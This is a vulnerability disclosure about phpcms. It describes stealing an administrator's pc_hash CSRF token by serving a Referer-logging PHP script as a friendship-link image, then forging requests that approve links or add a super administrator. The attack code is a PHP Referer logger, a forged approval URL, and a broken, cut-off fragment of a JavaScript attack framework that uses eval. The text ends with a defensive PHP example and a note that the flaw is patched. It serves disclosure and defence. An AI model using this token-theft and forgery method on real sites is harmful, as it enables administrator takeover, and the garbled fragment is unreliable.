As everyone knows, after logging in to the phpcms backend there is a pc_hash value that serves as the token protecting against CSRF attacks. So how can a combination of techniques still be used to carry out a CSRF attack? After phpcms is installed, anyone can apply for a friendship link by default. There are two types of links: text links and image links. For an image link, when the administrator reviews it, the image is displayed directly in the backend page. The backend URL contains the pc_hash, so we can recover this pc_hash from the Referer header of the image request. Why? The method is as follows. First, I wrote a script locally to record the Referer:
<?php
// Record the Referer header of whoever fetches this script.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
file_put_contents('referer.txt', $referer);
?>
Then, use the address of this script as the image address when applying for a friendship link. When the administrator opens the "Friendship link" function in the backend, I have already stolen its pc_hash. In practice this can be made to look more convincing: for example, if the PHP script outputs a real logo image, not only is the pc_hash obtained, but the request also looks like a genuine friendship-link application. Now I have obtained the Referer locally.

So what can be done with the pc_hash? CSRF, of course. Here is a simple example. I can construct the following link:

http://localhost/phpcms/index.php?m=link&c=link&a=check&linkid=4&pc_hash=lrP5dK

Served as an image, this link tricks the administrator's browser into reviewing and approving the link with id=4, that is, the friendship link I just applied for. Let's try again.
Gum = function () {var u = {'version': '000000', 'domain': '{domain}', 'backinfo': {}, 'author': 'https://github.com/quininer/gum'}; u.e = function (code) {try {return eval(code)} catch (e) {return ''}}; u.name = function (names) {return document.getElementsByTagName(names);}; u.html = function () {return u.name('html')[0] | document.write('
Replace pc_hash with the pc_hash you obtained, then place the above code on any HTML page (on any domain) and trick the administrator into visiting it. In this way you can add a super administrator account named test with the password 123123 on the target site:
Solution: No better suggestion than this: do not put pc_hash in the URL.
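The following is an added illustration of that advice, not phpcms code: the token is carried only in POST bodies, a token arriving in the query string is refused outright, and the admin page sends a Referrer-Policy header so its own URL is never disclosed to third-party image hosts. The session key, the csrf_token/csrf_check function names and the commented-out approve_link call are assumptions.

```php
<?php
// Added example (not phpcms code): a backend action whose CSRF token never
// appears in the URL. Session key and function names are assumptions.
session_start();

// One random token per session, carried only in POST bodies, never in GET.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(16));
    }
    return $_SESSION['csrf_token'];
}

// Only a POST carrying the session's token may change state.
function csrf_check(): bool {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        return false;                     // GET must never change state
    }
    if (isset($_GET['pc_hash']) || isset($_GET['csrf_token'])) {
        return false;                     // a token in the query string leaks via Referer; refuse it
    }
    $sent = $_POST['csrf_token'] ?? '';
    return is_string($sent) && hash_equals(csrf_token(), $sent);
}

// Stop this page's URL from reaching remote hosts when it embeds their images.
// Must be sent before any output.
header('Referrer-Policy: no-referrer');

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check()) {
        http_response_code(403);
        exit('invalid request');
    }
    // approve_link((int)($_POST['linkid'] ?? 0));   // hypothetical state change
    exit('ok');
}
?>
<!-- The review form: token in a hidden field, not in the action URL. -->
<form method="post" action="">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="hidden" name="linkid" value="4">
  <button type="submit">Approve link</button>
</form>
```

With this layout the image trick described above yields only the page's origin-free request, and the forged index.php?a=check GET is rejected because it is not a POST.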
Officially patched